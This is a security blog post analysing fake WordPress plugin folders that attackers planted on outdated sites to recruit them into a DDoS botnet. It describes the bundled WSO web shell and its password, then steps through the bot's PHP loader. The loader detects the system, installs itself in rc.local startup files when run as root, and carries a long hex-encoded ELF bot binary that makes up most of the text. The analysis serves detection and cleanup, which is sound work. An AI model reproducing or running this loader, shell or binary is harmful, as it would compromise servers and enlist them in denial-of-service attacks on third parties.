Fake WordPress Plugins

Over the last two days I have seen an increasing number of fake Wordress plugins which are actually not plugins but PHP scripts that attempt to join a botnet that is currently being used for DDoS attacks. So far the only common link I can see on all sites is that they are old vulnerable versions of WordPress. The two new ones I have seen that are common to all sites are ‘likebtn-like-button’ and ‘tell-a-friend’. If you find either of these folders in the ‘wp-content/plugins/’ folder you may be participating in DDoS attacks unknowingly.

Inside the ‘tell-a-friend’ folder there are 7 files uploaded, every site I checked that had these had the same content in these files:

  • button.gif – A like button to make it look legit I guess?
  • File.ext – A 2 byte file, appears to just be a single carriage return.
  • readme.txt – A read me file, I assume to also make this plugin look legit.
  • 4 PHP files with randomly generated names – no two were the same from the ones I found. Names where ones such as ‘z3tObCSwdg8Cd.php’, ‘zaLv7ZUnV.php’, ‘zNAnajFKekMM.php’, ‘zxIORPpHro.php’. All 4 files were exactly the same. Similar versions of these files were last seen a couple of months ago.

Inside the ‘likebtn-like-button’ folder there are 3 files uploaded:

  • index.php – No content displayed to browsers, contains single comment “Silence is golden.”
  • likebtn_like_button.php – WSO Shell 2.5. If you browse to this in a browser it is protected with the password ‘hashpsa’ (md5 is used in the file, the original hash is “c56ff4ccbccfa528e268998428f0a380”).
  • likebtn-like-button-readme.txt – A readme file, perhaps to look the plugin look legit.

The PHP files in the ‘tell-a-friend’ directory are the ones that connect to the botnet. Here is a simple step through of what it does:

The first part of the script starts off by making sure it will run on both PHP 4 and 5 and then killing any existing processes off. Notice the killall in this case is killing all instances of 'host' due to the basename function. If you check the process listing you will see this process appears to run as '/usr/bin/host'.

/* detect system */
$extra = "";
$f = fopen("/usr/bin/host", "rb");
if ($f) {
        $n = unpack("C*", fread($f, 8));
        $so[7] = sprintf("%c", $n[8]);
/* DEBUG */     print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
"; if ($n[8] == 9) { /* FreeBSD ldd fixes */ exec("ldd /usr/bin/host|awk '/(thr|bc.)/{print $3}'|sort|xargs", $extra); if (strpos($extra[0], "libthr") === false) $extra = "libc.so.7 libthr.so.3 "; else $extra = $extra[0]." "; /* autorun fixes */ if (! file_exists("/etc/rc.local")) touch("/etc/rc.local"); } fclose($f); }

The script checks to see if /usr/bin/host is readable using fopen (rb is read binary) and if it is checks to see which system the binary is compiled for. IF it is FreeBSD extra objects are loaded (the bot appears to support threading) and if /etc/rc.local doesn't exist it is created (empty). I assume this should not be created on most systems as the user the PHP script is running as should not have the correct privileges.

if (isset($_SERVER["SERVER_NAME"])) {
        /* called from the web, run as user */
        $AU=$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
        putenv("AU=".$AU);
/* DEBUG */     print "AU=".$AU."
"; } else { if (getmyuid() == 0) { $autorun = array ("/etc/rc.d/rc.local", "/etc/rc.local", "/etc/rc.d/rc.local"); $self = getcwd()."/1.php"; /* proc might be disabled */ if (! ($php = @readlink("/proc/self/exe"))) { $php = "php"; foreach (array("/usr/bin/php", "/usr/local/bin/php") as $p) if (file_exists($p)) { $php = $p; break; } } /* DEBUG */ print "PHP=".$php."n"; foreach ($autorun as $a) if (file_exists($a) && strpos($s = file_get_contents($a), $self) === false) { $s = str_replace("exit", "#exit", $s); file_put_contents($a, $php." -q ".$self." >/dev/nulln"); /* DEBUG */ print "Installed to ".$a."
n"; break; } } /* run anyway */ }

A check is done to determine if the script has been executed by the web server or if the script is running via the command line ($_SERVER is passed by the web server to the script with details of the request). If it is running via the web server the variable $AU is set to the server address in the format like domain.com/wp-content/plugins/tell-a-friend/zsEh2Kxjng.php.

If the script is running via the command line or some other method and it is being run as the user root (uid 0) it writes a copy of itself to the current working directory and adds itself to the files "/etc/rc.d/rc.local", "/etc/rc.local" and "/etc/rc.d/rc.local" so that it starts on boot. This should never happen normally unless you execute it manually for some reason.

$so32 = "x7fx45x4cx46x01x01x01x00x00x00x00x00x00x00x00x00x03x00x03x00x01x00x00x00x4cx8bx04x08x34x00x00x00xccx34x00x00x00x00x00x00x34x00x20x00x03x00x28x00x0ex00x0bx00x01x00x00x00x00x00x00x00x00x80x04x08x00x80x04x08x11x22x00x00x11x22x00x00x05x00x00x00x00x10x00x00x01x00x00x00x14x22x00x00x14xb2x04x08x14xb2x04x08x59x12x00x00xd8x22x00x00x06x00x00x00x00x10x00x00x02x00x00x00x14x22x00x00x14xb2x04x08x14xb2x04x08x80x00x00x00x80x00x00x00x06x00x00x00x04x00x00x00x25x00x00x00x33x00x00x00x00x00x00x00x29x00x00x00x12x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x28x00x00x00x0ax00x00x00x00x00x00x00x24x00x00x00x11x00x00x00x00x00x00x00x03x00x00x00x27x00x00x00x32x00x00x00x20x00x00x00x30x00x00x00x00x00x00x00x1bx00x00x00x25x00x00x00x00x00x00x00x2fx00x00x00x2bx00x00x00x16x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1cx00x00x00x00x00x00x00x2ax00x00x00x17x00x00x00x31x00x00x00x21x00x00x00x00x00x00x00x2dx00x00x00x23x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x05x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x0dx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x0fx00x00x00x15x00x00x00x04x00x00x00x14x00x00x00x02x00x00x00x00x00x00x00x0ex00x00x00x0cx00x00x00x00x00x00x00x06x00x00x00x1ex00x00x00x1fx00x00x00x1dx00x00x00x00x00x00x00x1ax00x00x00x00x00x00x00x0bx00x00x00x07x00x00x00x00x00x00x00x09x00x00x00x22x00x00x00x13x00x00x00x00x00x00x00x19x00x00x00x26x00x00x00x18x00x00x00x2cx00x00x00x2ex00x00x00x01x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x39x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x21x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x18x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x28x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00xd8x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x6ex01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x62x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00xadx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x0cx01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xcfx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x5fx01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xa6x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x2ex00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x79x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x05x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xa7x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00xebx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x74x00x00x00x90x8fx04x08x53x00x00x00x12x00x06x00x42x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00xc1x00x00x00x3dx95x04x08x85x00x00x00x12x00x06x00x08x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x2cx01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x20x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xbcx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x4cx01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xb5x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x67x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x27x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x1bx01x00x00xb7x9ex04x08x56x03x00x00x12x00x06x00x34x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x3bx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00xcax00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x66x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x59x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x91x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00xd7x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x6dx01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xdfx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x7ex00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x48x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x13x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x47x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x29x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x40x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x32x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00xf8x00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x3cx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x6fx00x00x00x00x00x00x00x00x00x00x00x10x00x00x00x53x01x00x00x00x00x00x00x00x00x00x00x10x00x00x00x00x73x6fx63x6bx65x74x00x73x65x74x73x6fx63x6bx6fx70x74x00x65x78x69x74x00x75x6ex73x65x74x65x6ex76x00x73x74x72x63x70x79x00x70x6fx70x65x6ex00x66x67x65x74x73x00x73x74x72x64x75x70x00x66x63x6cx6fx73x65x00x77x72x69x74x65x00x5fx5fx65x72x72x6ex6fx5fx6cx6fx63x61x74x69x6fx6ex00x73x68x75x74x64x6fx77x6ex00x72x65x63x76x00x72x65x61x6cx6cx6fx63x00x66x72x65x65x00x63x73x75x6dx00x70x75x74x73x00x70x74x68x72x65x61x64x5fx6dx75x74x65x78x5fx6cx6fx63x6bx00x70x74x68x72x65x61x64x5fx6dx75x74x65x78x5fx75x6ex6cx6fx63x6bx00x75x73x6cx65x65x70x00x63x6fx6ex6ex65x63x74x00x73x65x6ex64x74x6fx00x72x65x61x64x00x65x6ex63x69x70x68x65x72x00x74x69x6dx65x00x67x65x74x65x75x69x64x00x73x70x72x69x6ex74x66x00x67x65x74x61x64x64x72x69x6ex66x6fx00x66x72x65x65x61x64x64x72x69x6ex66x6fx00x70x74x68x72x65x61x64x5fx6ax6fx69x6ex00x6dx61x6cx6cx6fx63x00x70x74x68x72x65x61x64x5fx63x72x65x61x74x65x00x69x6ex69x74x00x73x69x67x6ex61x6cx00x66x6fx72x6bx00x75x6dx61x73x6bx00x73x65x74x73x69x64x00x63x68x72x6fx6fx74x00x73x74x72x63x68x72x00x61x74x6fx69x00x75x6ex6cx69x6ex6bx00x67x65x74x73x6fx63x6bx6ex61x6dx65x00x67x65x74x65x6ex76x00x73x74x72x63x6dx70x00x73x72x61x6ex64x6fx6dx00x00x00x00xa0xb2x04x08x07x01x00x00xa4xb2x04x08x07x02x00x00xa8xb2x04x08x07x03x00x00xacxb2x04x08x07x04x00x00xb0xb2x04x08x07x05x00x00xb4xb2x04x08x07x06x00x00xb8xb2x04x08x07x07x00x00xbcxb2x04x08x07x08x00x00xc0xb2x04x08x07x09x00x00xc4xb2x04x08x07x0ax00x00xc8xb2x04x08x07x0bx00x00xccxb2x04x08x07x0cx00x00xd0xb2x04x08x07x0dx00x00xd4xb2x04x08x07x0ex00x00xd8xb2x04x08x07x0fx00x00xdcxb2x04x08x07x10x00x00xe0xb2x04x08x07x11x00x00xe4xb2x04x08x07x12x00x00xe8xb2x04x08x07x13x00x00xecxb2x04x08x07x14x00x00xf0xb2x04x08x07x15x00x00xf4xb2x04x08x07x16x00x00xf8xb2x04x08x07x17x00x00xfcxb2x04x08x07x18x00x00x00xb3x04x08x07x19x00x00x04xb3x04x08x07x1ax00x00x08xb3x04x08x07x1bx00x00x0cxb3x04x08x07x1cx00x00x10xb3x04x08x07x1dx00x00x14xb3x04x08x07x1fx00x00x18xb3x04x08x07x20x00x00x1cxb3x04x08x07x21x00x00x20xb3x04x08x07x22x00x00x24xb3x04x08x07x23x00x00x28xb3x04x08x07x24x00x00x2cxb3x04x08x07x25x00x00x30xb3x04x08x07x26x00x00x34xb3x04x08x07x27x00x00x38xb3x04x08x07x28x00x00x3cxb3x04x08x07x29x00x00x40xb3x04x08x07x2ax00x00x44xb3x04x08x07x2bx00x00x48xb3x04x08x07x2cx00x00x4cxb3x04x08x07x2dx00x00x50xb3x04x08x07x2ex00x00x54xb3x04x08x07x2fx00x00x58xb3x04x08x07x30x00x00x5cxb3x04x08x07x31x00x00x60xb3x04x08x07x32x00x00xffxb3x04x00x00x00xffxa3x08x00x00x00x00x00x00x00xffxa3x0cx00x00x00x68x00x00x00x00xe9xe0xffxffxffxffxa3x10x00x00x00x68x08x00x00x00xe9xd0xffxffxffxffxa3x14x00x00x00x68x10x00x00x00xe9xc0xffxffxffxffxa3x18x00x00x00x68x18x00x00x00xe9xb0xffxffxffxffxa3x1cx00x00x00x68x20x00x00x00xe9xa0xffxffxffxffxa3x20x00x00x00x68x28x00x00x00xe9x90xffxffxffxffxa3x24x00x00x00x68x30x00x00x00xe9x80xffxffxffxffxa3x28x00x00x00x68x38x00x00x00xe9x70xffxffxffxffxa3x2cx00x00x00x68x40x00x00x00xe9x60xffxffxffxffxa3x30x00x00x00x68x48x00x00x00xe9x50xffxffxffxffxa3x34x00x00x00x68x50x00x00x00xe9x40xffxffxffxffxa3x38x00x00x00x68x58x00x00x00xe9x30xffxffxffxffxa3x3cx00x00x00x68x60x00x00x00xe9x20xffxffxffxffxa3x40x00x00x00x68x68x00x00x00xe9x10xffxffxffxffxa3x44x00x00x00x68x70x00x00x00xe9x00xffxffxffxffxa3x48x00x00x00x68x78x00x00x00xe9xf0xfexffxffxffxa3x4cx00x00x00x68x80x00x00x00xe9xe0xfexffxffxffxa3x50x00x00x00x68x88x00x00x00xe9xd0xfexffxffxffxa3x54x00x00x00x68x90x00x00x00xe9xc0xfexffxffxffxa3x58x00x00x00x68x98x00x00x00xe9xb0xfexffxffxffxa3x5cx00x00x00x68xa0x00x00x00xe9xa0xfexffxffxffxa3x60x00x00x00x68xa8x00x00x00xe9x90xfexffxffxffxa3x64x00x00x00x68xb0x00x00x00xe9x80xfexffxffxffxa3x68x00x00x00x68xb8x00x00x00xe9x70xfexffxffxffxa3x6cx00x00x00x68xc0x00x00x00xe9x60xfexffxffxffxa3x70x00x00x00x68xc8x00x00x00xe9x50xfexffxffxffxa3x74x00x00x00x68xd0x00x00x00xe9x40xfexffxffxffxa3x78x00x00x00x68xd8x00x00x00xe9x30xfexffxffxffxa3x7cx00x00x00x68xe0x00x00x00xe9x20xfexffxffxffxa3x80x00x00x00x68xe8x00x00x00xe9x10xfexffxffxffxa3x84x00x00x00x68xf0x00x00x00xe9x00xfexffxffxffxa3x88x00x00x00x68xf8x00x00x00xe9xf0xfdxffxffxffxa3x8cx00x00x00x68x00x01x00x00xe9xe0xfdxffxffxffxa3x90x00x00x00x68x08x01x00x00xe9xd0xfdxffxffxffxa3x94x00x00x00x68x10x01x00x00xe9xc0xfdxffxffxffxa3x98x00x00x00x68x18x01x00x00xe9xb0xfdxffxffxffxa3x9cx00x00x00x68x20x01x00x00xe9xa0xfdxffxffxffxa3xa0x00x00x00x68x28x01x00x00xe9x90xfdxffxffxffxa3xa4x00x00x00x68x30x01x00x00xe9x80xfdxffxffxffxa3xa8x00x00x00x68x38x01x00x00xe9x70xfdxffxffxffxa3xacx00x00x00x68x40x01x00x00xe9x60xfdxffxffxffxa3xb0x00x00x00x68x48x01x00x00xe9x50xfdxffxffxffxa3xb4x00x00x00x68x50x01x00x00xe9x40xfdxffxffxffxa3xb8x00x00x00x68x58x01x00x00xe9x30xfdxffxffxffxa3xbcx00x00x00x68x60x01x00x00xe9x20xfdxffxffxffxa3xc0x00x00x00x68x68x01x00x00xe9x10xfdxffxffxffxa3xc4x00x00x00x68x70x01x00x00xe9x00xfdxffxffxffxa3xc8x00x00x00x68x78x01x00x00xe9xf0xfcxffxffxffxa3xccx00x00x00x68x80x01x00x00xe9xe0xfcxffxffx55x89xe5x57x56x89xc6x53x83xecx2cx8bx10xb8x03x00x00x00xe8xaax16x00x00x81xc3x31x27x00x00xc7x45xe4x01x00x00x00xf6xc2x01x75x0bx89xd0xc1xe0x1dxc1xf8x1fx83xc0x02x83xe2x04x83xfax01x19xd2x83xe2x0bx51x83xc2x06x52x50x6ax02xe8xa4xfdxffxffx83xc4x10x85xc0x89xc1x0fx88xc9x00x00x00xf6x06x01x74x38x31xc0x83xbbxf8x11x00x00x09x8dx55xe4x89x4dxd4x0fx95xc0x83xecx0cx6ax04x83xc0x02x52x50x6ax00x51xe8xbexfdxffxffx83xc4x20x8bx4dxd4x85xc0x79x0ax83xecx0cx6ax00xe8xdaxfexffxffx8bx46x18x31xd2xbexe8x03x00x00x89x4dxd4xf7xf6x69xd2xe8x03x00x00x89x45xdcx31xc0x83xbbxf8x11x00x00x09x89x55xe0x0fx94xc0x31xd2x89xc7x48x4fx25x0exf0xffxffx81xe7x10xf0xffxffx05x06x10x00x00x81xc7x05x10x00x00x83xbbxf8x11x00x00x09x0fx94xc2x83xecx0cx89xd6x6ax08x4ex8dx55xdcx81xe6x02x00xffxffx52x81xc6xffxffx00x00x50x56x51x89x55xd0xe8x3axfdxffxffx8bx55xd0x83xc4x14x6ax08x8bx4dxd4x52x57x56x51xe8x26xfdxffxffx83xc4x20x8bx4dxd4xebx03x83xc9xffx8dx65xf4x89xc8x5bx5ex5fx5dxc3x55x89xe5x57x56x53xe8x87x15x00x00x81xc3x0ex26x00x00x81xecx9cx00x00x00x8dx83xe7xd9xffxffx25x00xf0xffxffxebx05x2dx00x10x00x00x81x38x7fx45x4cx46x75xf3x0fxb6x40x07x83xecx0cx89x83xf8x11x00x00x8dx83xe0x10x00x00x50xe8x97xfbxffxffx83xc4x10x83xbbxf8x11x00x00x09x8dx85x68xffxffxffx75x0ax56x56x8dx93xebx10x00x00xebx08x51x51x8dx93xefx10x00x00x52x50xe8x5cxfbxffxffx8dxb5x68xffxffxffx58x5ax8dx83xfdx10x00x00x50x56xe8x67xfbxffxffx83xc4x10x85xc0x89xc2x74x4cx31xc0xb9x20x00x00x00x89xf7xf3xabx89x95x64xffxffxffx57x52x6ax7fx56xe8xd3xfbxffxffx83xc4x10x8bx95x64xffxffxffx85xc0x74x18x83xecx0cx56xe8xcdxfcxffxffx8bx95x64xffxffxffx83xc4x10x89x83x28x12x00x00x83xecx0cx52xe8xc5xfcxffxffx83xc4x10x8dx65xf4x5bx5ex5fx5dxc3x55x83xc9xffx89xe5x57x89xd7x56x89xd6x53x31xd2x81xecx1cx40x00x00x89x85xdcxbfxffxffx31xc0xf2xaexe8x87x14x00x00x81xc3x0ex25x00x00xf7xd1x49x89x8dxe0xbfxffxffxebx56x50x8bx85xe0xbfxffxffx89x95xd8xbfxffxffx29xd0x50x8dx04x16x50xffxb5xdcxbfxffxffxe8xb6xfbxffxffx83xc4x10x8bx95xd8xbfxffxffx83xf8xffx89xc7x74x06x85xc0x74x2dxebx1fx89x95xd8xbfxffxffxe8xd5xfcxffxffx8bx95xd8xbfxffxffx8bx00x83xf8x0bx74x09x83xf8x04x74x04xebx0cx01xc2x39x95xe0xbfxffxffx77xa2x89xd7x31xd2x3bxbdxe0xbfxffxffx0fx85xedx00x00x00x50x31xf6x50x6ax01xffxb5xdcxbfxffxffx89x95xd8xbfxffxffxe8x30xfcxffxffx8bx95xd8xbfxffxffx8dx85xe8xbfxffxffx83xc4x10x89x85xe4xbfxffxffx6ax00x68x00x40x00x00x8dx85xe8xbfxffxffx50xffxb5xdcxbfxffxffx89x95xd8xbfxffxffxe8x4cxfaxffxffx83xc4x10x8bx95xd8xbfxffxffx85xc0x89xc1x7ex49x8dx04x06x57x57x89x85xe0xbfxffxffx40x50x52x89x8dxd8xbfxffxffxe8x74xfbxffxffx83xc4x10x8bx8dxd8xbfxffxffx85xc0x89xc2x74x6bx8dx04x30x8bxb5xe4xbfxffxffx89xc7xf3xa4x81xbdxe0xbfxffxffx00x00x10x00x8bxb5xe0xbfxffxffx7fx2cxebx89x41x75x27x89x95xd8xbfxffxffxe8xf6xfbxffxffx8bx95xd8xbfxffxffx8bx00x83xf8x0bx0fx84x6axffxffxffx83xf8x04x0fx84x61xffxffxffxebx0ex85xd2x74x0ax85xf6x74x06xc6x04x32x00xebx12x85xd2x74x0ex83xecx0cx52xe8x3fxfcxffxffx83xc4x10x31xd2x8dx65xf4x89xd0x5bx5ex5fx5dxc3x55xbaxf3x3ax62xccx89xe5x57x56x53xe8x01x13x00x00x81xc3x88x23x00x00x83xecx14x8bx30x8bx48x04x8dx3dxd0x00x00x00x89x7dxe4x89x45xe0x8bx45xe4x89xd7xc1xefx0bx83xe7x03x01xd8x8bx3cxb8x89x45xecx89xf0xc1xe0x04x01xd7x81xc2x47x86xc8x61x89x7dxf0x89xf7xc1xefx05x31xc7x8bx45xecx01xf7x31x7dxf0x89xd7x83xe7x03x8bx3cxb8x2bx4dxf0x01xd7x89xc8x89x7dxf0x89xcfxc1xefx05xc1xe0x04x31xc7x01xcfx31x7dxf0x2bx75xf0x85xd2x75xa6x8bx45xe0x89x30x89x48x04x83xc4x14x5bx5ex5fx5dxc3x55x89xe5x56x8bx55x08x31xf6x53x8bx45x0cxe8x6bx12x00x00x81xc3xf2x22x00x00xebx09x0fxb7x0ax48x83xc2x02x01xcex85xc0x7fxf3x83xecx0cx8dx83x32x11x00x00x50xe8x46xf9xffxffx89xf0x81xe6xffxffx00x00xc1xe8x10x01xc6x89xf0xc1xe8x10x8dx65xf8x01xf0x5bxf7xd0x5ex5dxc3x55xb9x08x00x00x00x89xe5x57x56x53x81xecxe8x00x01x00x8bx75x08x8dx45xb8xc7x85x34xffxfexffx08x00x00x00x89xc7x31xc0xf3xa5x8dx75xd8xe8xfbx11x00x00x81xc3x82x22x00x00x89xf7x89x8dx34xffxfexffxb1x04xf3xabx8dxbbxdcx11x00x00x57xe8x6cxfaxffxffx89x3cx24x89xf7xffx83xf4x11x00x00xe8x1cxfaxffxffx8bx85x34xffxfexffx83xc4x10x83xbbxf8x11x00x00x09xb9x04x00x00x00xf3xabx66xc7x45xd8x02x00x75x06x66xc7x45xd8x00x02x8bx45xc0x66xc1xc8x08x66x89x45xdax8bx45xbcx8bx4dxccx89x45xdcx69x45xd4xe8x03x00x00xf6x45xb8x01x89x8dx30xffxfexffx89x45xd4x74x2ax8dx45xb8xe8xb5xfaxffxffx83xecx0cxffx75xd4x89xc6x89xf7xe8x46xf8xffxffx83xc4x10xc1xefx1fx74x29x83xbbxfcx11x00x00x00x75xd8xebx1ex8bx45xc8x8dx95x38xffxfexffx85xc0x74x32x8bx75xc4x89xd7x89xc1x89x85x30xffxfexffxf3xa4xebx2dx89xb5x34xffxfexffx8dx83xdcx11x00x00xc7x85x2cxffxfexffx00x00x00x00x89x85x1cxffxfexffxe9xf7x03x00x00x8bx8dx30xffxfexffx31xc0x89xd7xf3xaaxc7x85x34xffxfexffx00x00x00x00xebxcdx66x8bx4dxc2x66x39x4dxc0x73x1fxe8x6dxf7xffxffx8bx75xc0x0fxb7x4dxc2x0fxb7xd6x29xd1x41x99xf7xf9x01xf2x66xc1xcax08x66x89x55xdax83x7dxc8x00x75x1cx83x7dxccx00x75x16xe8x42xf7xffxffxb9x00x02x00x00x99xf7xf9x83xc2x10x89x95x30xffxfexffxf6x45xb8x01x75x3dx8dx45xb8xe8xe3xf9xffxffx85xc0x89x85x34xffxfexffx0fx88x60x03x00x00x50x6ax10x8dx45xd8x50xffxb5x34xffxfexffxe8x23xf7xffxffx83xc4x10x40x0fx84x0ex03x00x00x8bxb5x30xffxfexffxe9x9dx02x00x00xe8xe9xf6xffxffx25xfexffx00x00xf6x45xb8x02x8dx70x01x74x2cxe8xd6xf6xffxffx89xc1x89xc2xc1xe9x18x80xf9x0ax74xefx80xf9xdfx77xeax80xf9x7fx74xe5xc1xe8x10x66x3dx10xacx74xdcx66x3dxa8xc0x74xd6xebx06x8bx93x00x12x00x00x8bx45xdcx66x8bx7dxdax66x89xb5x20xffxfexffx89x85x24xffxfexffx8bx45xb8x66x89xbdx22xffxfexffx83xe0x04x83xf8x01x19xc0x31xf6x83xe0xf4x8dx84x05x60xffxfexffx89x85x28xffxfexffx8bx45xc8x85xc0x74x2ax8bx75xc4x89xc1x8bxbdx28xffxfexffxf3xa4xebx2cx89x95x18xffxfexffxe8x50xf6xffxffx8bxbdx28xffxfexffx88x04x37x8bx95x18xffxfexffx46x8bx45xccx39xc6x72xdex8bxbdx28xffxfexffxc6x04x37x00xf6x45xb8x04x0fx84xccx00x00x00x8bx8dx20xffxfexffx8dx70x14x83xc0x21x66x8bxbdx22xffxfexffxd1xe8xc7x85x50xffxfexffx00x00x00x00xc7x85x54xffxfexffx00x00x00x00x66x89x8dx4cxffxfexffx8ax8dx58xffxfexffx66x89xbdx4exffxfexffx57x57x83xe1x0fx83xc9x50x88x8dx58xffxfexffx8ax8dx59xffxfexffx50x8dx85x40xffxfexffx50x83xe1xc0x83xc9x02x88x8dx59xffxfexffx8bx8dx24xffxfexffx66xc7x85x5axffxfexffx16xd0x66xc7x85x5cxffxfexffx00x00x66xc7x85x5exffxfexffx00x00x89x8dx44xffxfexffx89xf1x89x95x40xffxfexffx66xc1xc9x08xc6x85x48xffxfexffx00xc6x85x49xffxfexffx06x66x89x8dx4axffxfexffx89x95x18xffxfexffxe8x3dxf6xffxffx83xc4x10x66x89x85x5cxffxfexffxb8x06x00x00x00xe9x84x00x00x00x8bxbdx20xffxfexffx8dx70x08x83xc0x15x66x8bx8dx22xffxfexffxd1xe8x66xc7x85x52xffxfexffx00x00x89x95x40xffxfexffx66x89xbdx4cxffxfexffx8bxbdx24xffxfexffx66x89x8dx4exffxfexffx89xf1x66xc1xc9x08x66x89x8dx50xffxfexffx66x89x8dx4axffxfexffx51x51x50x8dx85x40xffxfexffx50x89xbdx44xffxfexffxc6x85x48xffxfexffx00xc6x85x49xffxfexffx11x89x95x18xffxfexffxe8xb4xf5xffxffx83xc4x10x66x89x85x52xffxfexffxb8x11x00x00x00x88x85x41xffxfexffx8bx85x24xffxfexffx83xc6x14x8bx95x18xffxfexffxc6x85x38xffxfexffx45xc6x85x39xffxfexffx00x89x85x48xffxfexffx89xf0x66xc1xc8x08x66x89x85x3axffxfexffx50x50x56x8dx85x38xffxfexffx50x66xc7x85x3cxffxfexffx01x00x66xc7x85x3exffxfexffx00x00xc6x85x40xffxfexffx40x66xc7x85x42xffxfexffx00x00x89x95x44xffxfexffxe8x38xf5xffxffx83xc4x10x83xbdx34xffxfexffx00x66x89x85x42xffxfexffx0fx88xa6x00x00x00x50x50x6ax10x8dx45xd8x50x6ax00x56x8dx85x38xffxfexffx50xffxb5x34xffxfexffxe8x84xf5xffxffx83xc4x20x85xc0x7ex42xffx85x2cxffxfexffx83xbdx2cxffxfexffx0ax7ex33x83xecx0cxffxb5x1cxffxfexffxe8x20xf6xffxffx8bx8dx2cxffxfexffx58xffxb5x1cxffxfexffx01x8bx04x12x00x00xe8xc8xf5xffxffx83xc4x10xc7x85x2cxffxfexffx00x00x00x00xf6x45xb8x01x75x3ax8dxb5x38xffxffxffx50x68x80x00x00x00x56xffxb5x34xffxfexffxe8xfdxf4xffxffx83xc4x10x85xc0x7fxe7x83xecx0cxffxb5x34xffxfexffxe8x48xf6xffxffx83xc4x10xc7x85x34xffxfexffxffxffxffxffx83xecx0cxffx75xd4xe8x00xf4xffxffx83xc4x10x83xbbxfcx11x00x00x00x0fx85x14xfcxffxffx83xbdx34xffxfexffx00x78x11x83xecx0cxffxb5x34xffxfexffxe8x09xf6xffxffx83xc4x10x83xecx0cx8dxb3xdcx11x00x00x56xe8x77xf5xffxffx89x34x24xffx8bxf4x11x00x00xe8x29xf5xffxffx8dx65xf4x31xc0x5bx5ex5fx5dxc3x55x89xe5x57x56x83xecx10x8bx75x0cx69x45x08xb9x79x37x9ex8bx0ex89x45xf0x8bx56x04x31xc0x89x75xe8xebx50x8bx7dx10x89xc6x83xe6x03x8bx34xb7x89xd7xc1xefx05x01xc6x2dx47x86xc8x61x89x75xf4x89xd6xc1xe6x04x31xf7x01xd7x31x7dxf4x03x4dxf4x89xcfx89xcexc1xe6x04xc1xefx05x31xf7x8bx75x10x01xcfx89x7dxf4x89xc7xc1xefx0bx83xe7x03x8bx3cxbex01xc7x31x7dxf4x03x55xf4x3bx45xf0x75xabx8bx75xe8x89x0ex89x56x04x83xc4x10x5ex5fx5dxc3x55xb9x80x00x00x00x89xe5x57x56x89xc6x8dx95xb4xfdxffxffx31xc0x53x89xd7x81xecx7cx06x00x00xe8x29x0cx00x00x81xc3xb0x1cx00x00xf3xabx89xb5xb8xfdxffxffx4exc7x85xb4xfdxffxffxefxbexadxdex75x71x8bxb3x28x12x00x00x8dx95xc0xfdxffxffx85xf6x74x10x89xf7x83xc9xffxf2xaex89xd7xf7xd1x49xf3xa4x89xfax8bxb3x0cx12x00x00xc6x02x2ax42x85xf6x74x12x89xf7x31xc0x83xc9xffxf2xaex89xd7xf7xd1x49xf3xa4x89xfax31xc0xc6x04x02x00x40x83xf8x07x75xf6x8dx45xe8xb9x08x00x00x00x29xc2x8dx82x36x02x00x00x99xf7xf9x8dx04xc5x08x00x00x00x89x85x9cxf9xffxffxe9xabx00x00x00x8bx83xf4x11x00x00x83xbbx10x12x00x00x00xc7x85xc4xfdxffxffx00x00x00x00x89x85xbcxfdxffxffx8bx83x30x12x00x00x89x85xc0xfdxffxffx74x63x83xecx0cx6ax00xe8x87xf3xffxffx83xc4x10x89xc1x2bx8bx10x12x00x00x74x10x8bx83x04x12x00x00x31xd2xf7xf1x89x85xc4xfdxffxffxffxb5xc4